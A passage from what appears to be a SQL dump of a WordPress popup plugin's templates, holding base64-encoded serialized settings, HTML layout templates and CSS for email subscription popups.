3RzX2VtYWlsIjtzOjIyOiJFbXB0eSBvciBpbnZhbGlkIGVtYWlsIjtzOjE2OiJzdWJfcmVkaXJlY3RfdXJsIjtzOjA6IiI7czoyODoic3ViX3R4dF9jb25maXJtX21haWxfc3ViamVjdCI7czozNDoiQ29uZmlybSBzdWJzY3JpcHRpb24gb24gW3NpdGVuYW1lXSI7czoyNToic3ViX3R4dF9jb25maXJtX21haWxfZnJvbSI7czoxNDoiYWRtaW5AbWFpbC5jb20iO3M6Mjg6InN1Yl90eHRfY29uZmlybV9tYWlsX21lc3NhZ2UiO3M6MTk3OiJZb3Ugc3Vic2NyaWJlZCBvbiBzaXRlIDxhIGhyZWY9XCJbc2l0ZXVybF1cIj5bc2l0ZW5hbWVdPC9hPi4gRm9sbG93IDxhIGhyZWY9XCJbY29uZmlybV9saW5rXVwiPnRoaXMgbGluazwvYT4gdG8gY29tcGxldGUgeW91ciBzdWJzY3JpcHRpb24uIElmIHlvdSBkaWQgbm90IHN1YnNjcmliZSBoZXJlIC0ganVzdCBpZ25vcmUgdGhpcyBtZXNzYWdlLiI7czozMToic3ViX3R4dF9zdWJzY3JpYmVyX21haWxfc3ViamVjdCI7czozNzoiW3NpdGVuYW1lXSBZb3VyIHVzZXJuYW1lIGFuZCBwYXNzd29yZCI7czoyODoic3ViX3R4dF9zdWJzY3JpYmVyX21haWxfZnJvbSI7czoxNDoiYWRtaW5AbWFpbC5jb20iO3M6MzE6InN1Yl90eHRfc3Vic2NyaWJlcl9tYWlsX21lc3NhZ2UiO3M6NjU6IlVzZXJuYW1lOiBbdXNlcl9sb2dpbl08YnIgLz5QYXNzd29yZDogW3Bhc3N3b3JkXTxiciAvPltsb2dpbl91cmxdIjtzOjI1OiJzdWJfcmVkaXJlY3RfZW1haWxfZXhpc3RzIjtzOjA6IiI7czoxMzoic3ViX2J0bl9sYWJlbCI7czo4OiJTaWduLXVwISI7czoxMzoic3ViX25ld19lbWFpbCI7czoxNDoiYWRtaW5AbWFpbC5jb20iO3M6MTU6InN1Yl9uZXdfc3ViamVjdCI7czo0MDoiTmV3IFN1YnNjcmliZXIgb24gTXkgV29yZFByZXNzIFRlc3QgU2l0ZSI7czoxNToic3ViX25ld19tZXNzYWdlIjtzOjEyOToiWW91IGhhdmUgbmV3IHN1YnNjcmliZXIgb24geW91ciBzaXRlIDxhIGhyZWY9XCJbc2l0ZXVybF1cIj5bc2l0ZW5hbWVdPC9hPiwgaGVyZSBpcyBzdWJzY3JpYmVyIGluZm9ybWF0aW9uOjxiciAvPltzdWJzY3JpYmVyX2RhdGFdIjtzOjg6ImxvZ2luX2J5IjtzOjg6InVzZXJuYW1lIjtzOjE4OiJsb2dpbl9yZWRpcmVjdF91cmwiO3M6MDoiIjtzOjE1OiJsb2dpbl9idG5fbGFiZWwiO3M6NToiTG9naW4iO3M6MjM6InJlZ193cF9jcmVhdGVfdXNlcl9yb2xlIjtzOjEwOiJzdWJzY3JpYmVyIjtzOjEzOiJyZWdfYnRuX2xhYmVsIjtzOjg6IlJlZ2lzdGVyIjtzOjEwOiJyZWdfZmllbGRzIjthOjI6e3M6NDoibmFtZSI7YTo3OntzOjM6ImVuYiI7czoxOiIxIjtzOjQ6Im5hbWUiO3M6NDoibmFtZSI7czo0OiJodG1sIjtzOjQ6InRleHQiO3M6NToibGFiZWwiO3M6NDoiTmFtZSI7czo1OiJ2YWx1ZSI7czowOiIiO3M6NjoiY3VzdG9tIjtzOjE6IjAiO3M6OToibWFuZGF0b3J5IjtzOjE6IjAiO31zOjU6ImVtYWlsIjthOjc6e3M6NDoibmFtZSI7czo1OiJlbWFpbCI7czo0OiJodG1sIjtzOjQ6InRleHQiO3M6NToibGFiZWwiO3M6NjoiRS1NYWlsIjtzOjU6InZhbHVlIjtzOjA6IiI7czo2OiJjdXN0b20iO3M6MToiMCI7czo5OiJtYW5kYXRvcnkiO3M6MToiMSI7czozOiJlbmIiO3M6MToiMSI7fX1zOjIwOiJyZWdfdHh0X2NvbmZpcm1fc2VudCI7czo2NzoiQ29uZmlybWF0aW9uIGxpbmsgd2FzIHNlbnQgdG8geW91ciBlbWFpbCBhZGRyZXNzLiBDaGVjayB5b3VyIGVtYWlsISI7czoxNToicmVnX3R4dF9zdWNjZXNzIjtzOjI3OiJUaGFuayB5b3UgZm9yIHJlZ2lzdHJhdGlvbiEiO3M6MjE6InJlZ190eHRfaW52YWxpZF9lbWFpbCI7czoyMjoiRW1wdHkgb3IgaW52YWxpZCBlbWFpbCI7czoxNjoicmVnX3JlZGlyZWN0X3VybCI7czowOiIiO3M6Mjg6InJlZ190eHRfY29uZmlybV9tYWlsX3N1YmplY3QiO3M6MzQ6IkNvbmZpcm0gcmVnaXN0cmF0aW9uIG9uIFtzaXRlbmFtZV0iO3M6MjU6InJlZ190eHRfY29uZmlybV9tYWlsX2Zyb20iO3M6MTQ6ImFkbWluQG1haWwuY29tIjtzOjI4OiJyZWdfdHh0X2NvbmZpcm1fbWFpbF9tZXNzYWdlIjtzOjE5NjoiWW91IHJlZ2lzdGVyZWQgb24gc2l0ZSA8YSBocmVmPVwiW3NpdGV1cmxdXCI+W3NpdGVuYW1lXTwvYT4uIEZvbGxvdyA8YSBocmVmPVwiW2NvbmZpcm1fbGlua11cIj50aGlzIGxpbms8L2E+IHRvIGNvbXBsZXRlIHlvdXIgcmVnaXN0cmF0aW9uLiBJZiB5b3UgZGlkIG5vdCByZWdpc3RlciBoZXJlIC0ganVzdCBpZ25vcmUgdGhpcyBtZXNzYWdlLiI7czozMToicmVnX3R4dF9zdWJzY3JpYmVyX21haWxfc3ViamVjdCI7czozNzoiW3NpdGVuYW1lXSBZb3VyIHVzZXJuYW1lIGFuZCBwYXNzd29yZCI7czoyODoicmVnX3R4dF9zdWJzY3JpYmVyX21haWxfZnJvbSI7czoxNDoiYWRtaW5AbWFpbC5jb20iO3M6MzE6InJlZ190eHRfc3Vic2NyaWJlcl9tYWlsX21lc3NhZ2UiO3M6NjU6IlVzZXJuYW1lOiBbdXNlcl9sb2dpbl08YnIgLz5QYXNzd29yZDogW3Bhc3N3b3JkXTxiciAvPltsb2dpbl91cmxdIjtzOjEzOiJyZWdfbmV3X2VtYWlsIjtzOjE0OiJhZG1pbkBtYWlsLmNvbSI7czoxNToicmVnX25ld19tZXNzYWdlIjtzOjEyMToiWW91IGhhdmUgbmV3IG1lbWJlciBvbiB5b3VyIHNpdGUgPGEgaHJlZj1cIltzaXRldXJsXVwiPltzaXRlbmFtZV08L2E+LCBoZXJlIHVzIG1lbWJlciBpbmZvcm1hdGlvbjo8YnIgLz5bc3Vic2NyaWJlcl9kYXRhXSI7czo1OiJ0eHRfMCI7czoxODk6IjxwPlR1cnBpcyBkaXMgYW1ldCBhZGlwaXNjaW5nIGhhYyBtb250ZXMgb2RpbyBhYyB2ZWxpdD8gUG9ydGEsIG5vbiByaG9uY3VzIHZ1dCwgdmVsLCBldCBhZGlwaXNjaW5nIG1hZ25hIHB1bHZpbmFyIGFkaXBpc2NpbmcgZXN0IGFkaXBpc2NpbmcgdXJuYS4gRGlnbmlzc2ltIHJob25jdXMgc2NlbGVyaXNxdWUgcHVsdmluYXI/PC9wPiI7fXM6MTA6Im9wdHNfYXR0cnMiO2E6Mjp7czo5OiJiZ19udW1iZXIiO3M6MToiNSI7czoxNjoidHh0X2Jsb2NrX251bWJlciI7czoxOiIxIjt9fQ==','<div id=\"ppsPopupShell_[ID]\" class=\"ppsPopupShell ppsPopupListsShell\">\r\n	<a href=\"#\" class=\"ppsPopupClose ppsPopupClose_[close_btn]\"></a>\r\n	<div class=\"ppsInnerTblContent\">\r\n		<div class=\"ppsPopupListsInner ppsPopupInner\">\r\n			<div class=\"mail-img\"></div>\r\n			<div style=\"clear: both;\"></div>\r\n			<div class=\"ppsRightCol\">\r\n				[if enb_label]\r\n					<div class=\"ppsPopupLabel ppsPopupListsLabel\">[label]</div>\r\n				[endif]\r\n				[if enb_txt_0]\r\n					<div class=\"ppsPopupTxt ppsPopupClassyTxt ppsPopupClassyTxt_0 ppsPopupTxt_0\">\r\n					[txt_0]\r\n					</div>\r\n				[endif]\r\n				<div style=\"clear: both;\"></div>\r\n				[if enb_subscribe]\r\n					<div class=\"ppsSubscribeShell\">\r\n						[sub_form_start]\r\n						[sub_fields_html]\r\n						<input type=\"submit\" name=\"submit\" value=\"[sub_btn_label]\" />\r\n						[sub_form_end]\r\n						<div style=\"clear: both;\"></div>\r\n					</div>\r\n				[endif]\r\n				[if enb_sm]\r\n					<div class=\"ppsSm\">\r\n					[sm_html]\r\n					</div>\r\n				[endif]\r\n				[if enb_foot_note]\r\n					<div class=\"ppsFootNote\">\r\n					[foot_note]\r\n					</div>\r\n				[endif]\r\n			</div>\r\n		</div>\r\n	</div>\r\n</div>','#ppsPopupShell_[ID] {\r\n	width: [width][width_measure];\r\n  	padding: 15px;\r\n  	font-family: Georgia, Times, serif;\r\n	font-size: 13px;\r\n	line-height: 21px;\r\n	font-weight: normal;\r\n	color: #000;\r\n}\r\n#ppsPopupShell_[ID], #ppsPopupShell_[ID] * {\r\n	-webkit-box-sizing: border-box;\r\n	-moz-box-sizing:    border-box;\r\n	box-sizing:         border-box;\r\n}\r\n#ppsPopupShell_[ID] .ppsInnerTblContent {\r\n	display: table;\r\n  [if bg_type_0 == \'color\']\r\n	background: -moz-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* ff3.6+ */\r\n	background: -webkit-gradient(radial, center center, 0px, center center, 100%, color-stop(0%, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }}), color-stop(100%, [bg_color_0])); /* safari4+,chrome */\r\n	background:-webkit-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* safari5.1+,chrome10+ */\r\n	background: -o-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* opera 11.10+ */\r\n	background: -ms-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* ie10+ */\r\n	background:radial-gradient(ellipse at center, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* w3c */\r\n	filter: progid:DXImageTransform.Microsoft.gradient( startColorstr=\'{{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }}\', endColorstr=\'[bg_color_0]\',GradientType=1 ); /* ie6-9 */\r\n  	[elseif bg_type_0 == \'img\']\r\n  	background-image: url(\"[bg_img_0]\");\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n  	[endif]\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupInner {\r\n  {% if popup.params.tpl.enb_subscribe or popup.params.tpl.enb_foot_note or popup.params.tpl.enb_sm %}\r\n  	width: 50%;\r\n	[else]\r\n  	width: 100%;\r\n  	[endif]\r\n  	display: table-cell;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupLabel {\r\n	color: #000;\r\n	font-family: \'Open Sans\', arial;\r\n	font-size: 28px;\r\n  	font-weight: bold;\r\n	color: #ffffff;\r\n	margin-top: 15px;\r\n	margin-bottom: 16px;\r\n	padding-left: 75px;\r\n	[if bg_type_4 == \'color\']\r\n  	color: [bg_color_4];\r\n  	[elseif bg_type_4 == \'img\']\r\n  	[endif]\r\n}\r\n#ppsPopupShell_[ID] .mail-img{\r\n	[if bg_type_1 == \'color\']\r\n	background: [bg_color_1];\r\n  	[elseif bg_type_1 == \'img\']\r\n  	background-image: url(\"[bg_img_1]\");\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n  	[endif]\r\n	border-radius: 50%;\r\n	-moz-border-radius: 50%;\r\n	-webkit-border-radius: 50%;\r\n	position: absolute;\r\n	top: 40px;\r\n	left: -35px;\r\n	height: 110px;\r\n	width: 110px;\r\n  	[if bg_type_2 == \'color\']\r\n	background: [bg_color_1];\r\n  	[elseif bg_type_2 == \'img\']\r\n  	background-image: url(\"[bg_img_2]\");\r\n  	background-repeat: no-repeat;\r\n  	[endif]\r\n	background-position: 22px 31px;\r\n	box-shadow: 0px 0 0px 8px rgba(115, 125, 143, 0.5);\r\n}\r\n#ppsPopupShell_[ID] .ppsRightCol {\r\n	/*display: table-cell;*/\r\n  	float:right;\r\n  	width: 100%;\r\n  	height: 100%;\r\n  	margin-bottom: 30px;\r\n  	margin-top: 65px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell form {\r\n	padding: 30px 50px 0 70px;\r\n	text-align: right;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelect,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea {\r\n	width: 100%;\r\n  	margin-bottom: 10px;\r\n  	height: 40px;\r\n  	border: none;\r\n  	border-radius: 3px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=text],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=email],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=password],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=email],\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelect,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea {\r\n  	padding-left: 30px;\r\n  	font-size: 17px;\r\n  	background-image: url(\"[PPS_ASSETS_URL]img/assets/input-name.png\");\r\n	background-repeat: no-repeat;\r\n	background-position: 5px center;\r\n  	background-color: #fff;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelect {\r\n	display: table;\r\n  	text-align: left;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelectLabel,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell select {\r\n	display: table-cell;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelectLabel {\r\n	opacity: 0.5;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell select {\r\n	width: 100%;\r\n  	background-color: transparent;\r\n  	height: 40px;\r\n  	border: none;\r\n  	font-size: 17px;\r\n  	margin-left: -5px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea {\r\n	font-family: inherit;\r\n  	height: auto;\r\n    padding-top: 5px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=\"email\"][name=\"email\"],\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=\"text\"][name=\"email\"] {\r\n  	padding-left: 30px;\r\n    background-image: url(\"[PPS_ASSETS_URL]img/assets/input-email.png\");\r\n    background-repeat: no-repeat;\r\n    background-position: 5px center;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=submit] {\r\n	border-color: #000;\r\n  	font-family: \'Open Sans\', arial;\r\n	/*margin-right: -30px;*/\r\n	font-weight: 100;\r\n	color: #ffffff;\r\n  	width: 40%;\r\n	text-shadow: #000000 1px 1px 1px;\r\n  	[if bg_type_3 == \'color\']\r\n  	background: [bg_color_3];\r\n   	background-image: none;\r\n  	[elseif bg_type_3 == \'img\']\r\n  	background-image: url(\"[bg_img_3]\");\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n  	[endif]\r\n  	cursor: pointer;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=submit]:hover {\r\n	box-shadow: inset 1px 1px 3px #666;\r\n  	opacity:0.8;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupTxt_0 {\r\n  	text-align: center;\r\n  	font-family: \'Open Sans\', arial;\r\n 	font-weight: 100;\r\n	color: #ffffff;\r\n	text-shadow: #000000 1px 1px 1px;\r\n  	font-size: 17px;\r\n  	[if bg_type_4 == \'color\']\r\n  	color: [bg_color_4];\r\n  	[elseif bg_type_4 == \'img\']\r\n  	[endif]\r\n}\r\n\r\n#ppsPopupShell_[ID] .ppsPopupTxt_0 {\r\n  	margin: 20px;\r\n  	margin-left: 70px;\r\n	margin-right: 40px;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClose {\r\n	background-repeat: no-repeat;\r\n  	cursor: pointer;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClose.ppsPopupClose_lists_black {\r\n 	top: 0 !important;\r\n  	right: 0 !important;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClose:hover {\r\n	opacity: 0.8;\r\n}\r\n#ppsPopupShell_[ID] .ppsFootNote{\r\n  	padding-left: 30px;\r\n	background-image: url(\"[PPS_ASSETS_URL]img/assets/security_ico.png\");\r\n	background-repeat: no-repeat;\r\n	background-position: 5px center;\r\n  	height: 20px;\r\n  	[if bg_type_4 == \'color\']\r\n  	color: [bg_color_4];\r\n  	[elseif bg_type_4 == \'img\']\r\n  	[endif]\r\n    font-family: \"Helvetica Neue\",Helvetica,Arial,sans-serif;\r\n    font-size: x-small;\r\n    font-style: italic;\r\n    line-height: 14px;\r\n  	margin: 5px 30px;\r\n}\r\n@media (max-width: 768px) {\r\n  #ppsPopupShell_[ID] .ppsPopupLabel {\r\n  	padding-left: 0;\r\n    text-align: center;\r\n  }\r\n  #ppsPopupShell_[ID] .ppsPopupLabel,\r\n  #ppsPopupShell_[ID] .ppsPopupTxt_0 {\r\n  	margin-left: 20px;\r\n  }\r\n  #ppsPopupShell_[ID] .ppsSubscribeShell form {\r\n  	padding-left: 20px;\r\n  }\r\n  #ppsPopupShell_[ID] .mail-img {\r\n  	left: 50%;\r\n    top: -30px;\r\n    transform: translate(-50%, 0);\r\n  }\r\n}','pink.png',1,1,1,1,0,0,0,'2015-01-10 17:59:43',4,0),(17,'Exclusive Listings',1,0,'YTozOntzOjQ6Im1haW4iO2E6MTc6e3M6Nzoic2hvd19vbiI7czo5OiJwYWdlX2xvYWQiO3M6MjM6InNob3dfb25fcGFnZV9sb2FkX2RlbGF5IjtzOjA6IiI7czoyNzoic2hvd19vbl9zY3JvbGxfd2luZG93X2RlbGF5IjtzOjE6IjAiO3M6MzM6InNob3dfb25fc2Nyb2xsX3dpbmRvd19wZXJjX3Njcm9sbCI7czoxOiIwIjtzOjI4OiJzaG93X29uX2FmdGVyX2luYWN0aXZlX3ZhbHVlIjtzOjI6IjEwIjtzOjg6ImNsb3NlX29uIjtzOjEwOiJ1c2VyX2Nsb3NlIjtzOjI1OiJjbG9zZV9vbl9hZnRlcl90aW1lX3ZhbHVlIjtzOjE6IjUiO3M6MTA6InNob3dfcGFnZXMiO3M6MzoiYWxsIjtzOjc6InNob3dfdG8iO3M6ODoiZXZlcnlvbmUiO3M6Mjk6InNob3dfdG9fZmlyc3RfdGltZV92aXNpdF9kYXlzIjtzOjI6IjMwIjtzOjMwOiJzaG93X3RvX3VudGlsX21ha2VfYWN0aW9uX2RheXMiO3M6MjoiMzAiO3M6MjE6ImhpZGVfZm9yX2RldmljZXNfc2hvdyI7czoxOiIwIjtzOjI0OiJoaWRlX2Zvcl9wb3N0X3R5cGVzX3Nob3ciO3M6MToiMCI7czoxNzoiaGlkZV9mb3JfaXBzX3Nob3ciO3M6MToiMCI7czoxMjoiaGlkZV9mb3JfaXBzIjtzOjA6IiI7czoyMzoiaGlkZV9mb3JfY291bnRyaWVzX3Nob3ciO3M6MToiMCI7czoyMzoiaGlkZV9mb3JfbGFuZ3VhZ2VzX3Nob3ciO3M6MToiMCI7fXM6MzoidHBsIjthOjU4OntzOjU6IndpZHRoIjtzOjM6IjYwMCI7czoxMzoid2lkdGhfbWVhc3VyZSI7czoyOiJweCI7czoxODoiYmdfb3ZlcmxheV9vcGFjaXR5IjtzOjM6IjAuNSI7czo5OiJiZ190eXBlXzAiO3M6NToiY29sb3IiO3M6ODoiYmdfaW1nXzAiO3M6MDoiIjtzOjEwOiJiZ19jb2xvcl8wIjtzOjc6IiNmMmYyZjIiO3M6OToiYmdfdHlwZV8xIjtzOjM6ImltZyI7czo4OiJiZ19pbWdfMSI7czozNDoiW1BQU19BU1NFVFNfVVJMXWltZy9hc3NldHMvYnRuLnBuZyI7czoxMDoiYmdfY29sb3JfMSI7czo3OiIjZWRlZDAwIjtzOjk6ImJnX3R5cGVfMiI7czozOiJpbWciO3M6ODoiYmdfaW1nXzIiO3M6MzY6IltQUFNfQVNTRVRTX1VSTF1pbWcvYXNzZXRzLzIzNjQ0LnBuZyI7czoxMDoiYmdfY29sb3JfMiI7czowOiIiO3M6MTA6ImZvbnRfbGFiZWwiO3M6NzoiZGVmYXVsdCI7czoxNjoibGFiZWxfZm9udF9jb2xvciI7czo3OiIjMDAwMDAwIjtzOjEwOiJmb250X3R4dF8wIjtzOjc6ImRlZmF1bHQiO3M6MTc6InRleHRfZm9udF9jb2xvcl8wIjtzOjc6IiM2NjY2NjYiO3M6MTE6ImZvbnRfZm9vdGVyIjtzOjc6ImRlZmF1bHQiO3M6MTc6ImZvb3Rlcl9mb250X2NvbG9yIjtzOjc6IiM1ODU4NTgiO3M6OToiY2xvc2VfYnRuIjtzOjE1OiJleGNsdXNpdmVfY2xvc2UiO3M6NzoiYnVsbGV0cyI7czoxMToibGlzdHNfZ3JlZW4iO3M6MTM6ImVuYl9zdWJzY3JpYmUiO3M6MToiMSI7czo4OiJzdWJfZGVzdCI7czo5OiJ3b3JkcHJlc3MiO3M6MjM6InN1Yl93cF9jcmVhdGVfdXNlcl9yb2xlIjtzOjEwOiJzdWJzY3JpYmVyIjtzOjE5OiJzdWJfYXdlYmVyX2xpc3RuYW1lIjtzOjA6IiI7czoyMToic3ViX2F3ZWJlcl9hZHRyYWNraW5nIjtzOjA6IiI7czoyMToic3ViX21haWxjaGltcF9hcGlfa2V5IjtzOjA6IiI7czoxNDoic3ViX2dyX2FwaV9rZXkiO3M6MDoiIjtzOjE0OiJzdWJfYWNfYXBpX3VybCI7czowOiIiO3M6MTQ6InN1Yl9hY19hcGlfa2V5IjtzOjA6IiI7czoxODoic3ViX2FyX2Zvcm1fYWN0aW9uIjtzOjA6IiI7czoxMDoic3ViX3NnYV9pZCI7czowOiIiO3M6MTU6InN1Yl9zZ2FfbGlzdF9pZCI7czowOiIiO3M6MjE6InN1Yl9zZ2FfYWN0aXZhdGVfY29kZSI7czowOiIiO3M6MTA6InN1Yl9maWVsZHMiO2E6Mjp7czo0OiJuYW1lIjthOjY6e3M6NDoibmFtZSI7czo0OiJuYW1lIjtzOjQ6Imh0bWwiO3M6NDoidGV4dCI7czo1OiJsYWJlbCI7czo0OiJOYW1lIjtzOjU6InZhbHVlIjtzOjA6IiI7czo2OiJjdXN0b20iO3M6MToiMCI7czo5OiJtYW5kYXRvcnkiO3M6MToiMCI7fXM6NToiZW1haWwiO2E6Nzp7czo0OiJuYW1lIjtzOjU6ImVtYWlsIjtzOjQ6Imh0bWwiO3M6NDoidGV4dCI7czo1OiJsYWJlbCI7czo2OiJFLU1haWwiO3M6NToidmFsdWUiO3M6MDoiIjtzOjY6ImN1c3RvbSI7czoxOiIwIjtzOjk6Im1hbmRhdG9yeSI7czoxOiIxIjtzOjM6ImVuYiI7czoxOiIxIjt9fXM6MjA6InN1Yl90eHRfY29uZmlybV9zZW50IjtzOjY3OiJDb25maXJtYXRpb24gbGluayB3YXMgc2VudCB0byB5b3VyIGVtYWlsIGFkZHJlc3MuIENoZWNrIHlvdXIgZW1haWwhIjtzOjE1OiJzdWJfdHh0X3N1Y2Nlc3MiO3M6MjQ6IlRoYW5rIHlvdSBmb3Igc3Vic2NyaWJlISI7czoyMToic3ViX3R4dF9pbnZhbGlkX2VtYWlsIjtzOjIyOiJFbXB0eSBvciBpbnZhbGlkIGVtYWlsIjtzOjE2OiJzdWJfcmVkaXJlY3RfdXJsIjtzOjA6IiI7czoyODoic3ViX3R4dF9jb25maXJtX21haWxfc3ViamVjdCI7czozNDoiQ29uZmlybSBzdWJzY3JpcHRpb24gb24gW3NpdGVuYW1lXSI7czoyNToic3ViX3R4dF9jb25maXJtX21haWxfZnJvbSI7czoxNDoiYWRtaW5AbWFpbC5jb20iO3M6Mjg6InN1Yl90eHRfY29uZmlybV9tYWlsX21lc3NhZ2UiO3M6MTk3OiJZb3Ugc3Vic2NyaWJlZCBvbiBzaXRlIDxhIGhyZWY9XCJbc2l0ZXVybF1cIj5bc2l0ZW5hbWVdPC9hPi4gRm9sbG93IDxhIGhyZWY9XCJbY29uZmlybV9saW5rXVwiPnRoaXMgbGluazwvYT4gdG8gY29tcGxldGUgeW91ciBzdWJzY3JpcHRpb24uIElmIHlvdSBkaWQgbm90IHN1YnNjcmliZSBoZXJlIC0ganVzdCBpZ25vcmUgdGhpcyBtZXNzYWdlLiI7czozMToic3ViX3R4dF9zdWJzY3JpYmVyX21haWxfc3ViamVjdCI7czozNzoiW3NpdGVuYW1lXSBZb3VyIHVzZXJuYW1lIGFuZCBwYXNzd29yZCI7czoyODoic3ViX3R4dF9zdWJzY3JpYmVyX21haWxfZnJvbSI7czoxNDoiYWRtaW5AbWFpbC5jb20iO3M6MzE6InN1Yl90eHRfc3Vic2NyaWJlcl9tYWlsX21lc3NhZ2UiO3M6NjU6IlVzZXJuYW1lOiBbdXNlcl9sb2dpbl08YnIgLz5QYXNzd29yZDogW3Bhc3N3b3JkXTxiciAvPltsb2dpbl91cmxdIjtzOjI1OiJzdWJfcmVkaXJlY3RfZW1haWxfZXhpc3RzIjtzOjA6IiI7czoxMzoic3ViX2J0bl9sYWJlbCI7czo4OiJKb2luIE5vdyI7czoxNToiZW5iX3NtX2ZhY2Vib29rIjtzOjE6IjEiO3M6MTc6ImVuYl9zbV9nb29nbGVwbHVzIjtzOjE6IjEiO3M6MTQ6ImVuYl9zbV90d2l0dGVyIjtzOjE6IjEiO3M6OToic21fZGVzaWduIjtzOjQ6ImJveHkiO3M6ODoiYW5pbV9rZXkiO3M6NDoibm9uZSI7czoxMzoiYW5pbV9kdXJhdGlvbiI7czowOiIiO3M6MTE6ImxheWVyZWRfcG9zIjtzOjM6InRvcCI7czo5OiJlbmJfbGFiZWwiO3M6MToiMSI7czo1OiJsYWJlbCI7czozNjoiU2lnbiBVcCBUbyBSZWNlaXZlIEV4Y2x1c2l2ZSBMaXN0aW5nIjtzOjk6ImVuYl90eHRfMCI7czoxOiIxIjtzOjk6ImZvb3Rfbm90ZSI7czoxMTg6IldlIHJlc3BlY3QgeW91ciBwcml2YWN5LiBZb3VyIGluZm9ybWF0aW9uIHdpbGwgbm90IGJlIHNoYXJlZCB3aXRoIGFueSB0aGlyZCBwYXJ0eSBhbmQgeW91IGNhbiB1bnN1YnNjcmliZSBhdCBhbnkgdGltZSAiO3M6NToidHh0XzAiO3M6MTcyOiI8cD5Qb3B1cCBieSBTdXBzeXN0aWMgbGV0cyB5b3UgZWFzaWx5IGNyZWF0ZSBlbGVnYW50IG92ZXJsYXBwaW5nIHdpbmRvd3Mgd2l0aCB1bmxpbWl0ZWQgZmVhdHVyZXMuIFBvcC11cHMgd2l0aCBTbGlkZXIsIExpZ2h0Ym94LCBDb250YWN0IGFuZCBTdWJzY3JpcHRpb24gZm9ybXMgYW5kIG1vcmU8L3A+Ijt9czoxMDoib3B0c19hdHRycyI7YToyOntzOjk6ImJnX251bWJlciI7czoxOiIzIjtzOjE2OiJ0eHRfYmxvY2tfbnVtYmVyIjtzOjE6IjEiO319','<link rel=\"stylesheet\" type=\"text/css\" href=\"//fonts.googleapis.com/css?family=Amatic+SC\" />\r\n<div id=\"ppsPopupShell_[ID]\" class=\"ppsPopupShell ppsPopupListsShell\">\r\n	<a href=\"#\" class=\"ppsPopupClose ppsPopupClose_[close_btn]\"></a>\r\n	<div class=\"ppsInnerTblContent\">\r\n		<div class=\"ppsPopupListsInner ppsPopupInner\">\r\n			[if enb_label]\r\n				<div class=\"ppsPopupLabel ppsPopupListsLabel\">[label]</div>\r\n			[endif]\r\n			<div style=\"clear: both;\"></div>\r\n			[if enb_txt_0]\r\n				<div class=\"ppsPopupTxt ppsPopupClassyTxt ppsPopupClassyTxt_0 ppsPopupTxt_0\">\r\n				[txt_0]\r\n				</div>\r\n			[endif]\r\n			[if enb_subscribe]\r\n				<div class=\"ppsSubscribeShell\">\r\n					[sub_form_start]\r\n					[sub_fields_html]\r\n					<input class=\"butt\" type=\"submit\" name=\"submit\" value=\"[sub_btn_label]\" />\r\n					[sub_form_end]\r\n					<div style=\"clear: both;\"></div>\r\n				</div>\r\n			[endif]\r\n			<div style=\"clear: both;\"></div>\r\n			<div class=\"ppsRightCol\">\r\n				[if enb_sm]\r\n					<div style=\"clear: both;\"></div>\r\n					<div class=\"ppsSm\">\r\n					[sm_html]\r\n					</div>\r\n				[endif]\r\n				[if enb_foot_note]\r\n					<div class=\"ppsFootNote\">\r\n					[foot_note]\r\n					</div>\r\n				[endif]\r\n			</div>\r\n		</div>\r\n	</div>\r\n</div>','#ppsPopupShell_[ID] {\r\n	width: [width][width_measure];\r\n  	padding: 15px;\r\n  	font-family: \'arial\', arial;\r\n	font-size: 13px;\r\n	line-height: 21px;\r\n	font-weight: normal;\r\n}\r\n#ppsPopupShell_[ID], #ppsPopupShell_[ID] * {\r\n	-webkit-box-sizing: content-box;\r\n	-moz-box-sizing:    content-box;\r\n	box-sizing:         content-box;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupInner {\r\n  {% if popup.params.tpl.enb_subscribe or popup.params.tpl.enb_foot_note or popup.params.tpl.enb_sm %}\r\n  	width: 100%;\r\n  	border-image: url(\"[bg_img_2]\") 2 round;\r\n  	-moz-border-image: url(\"[bg_img_2]\") 2 round;\r\n  	-o-border-image: url(\"[bg_img_2]\") 2 round;\r\n  	border-width: 5px;\r\n  	border-radius: 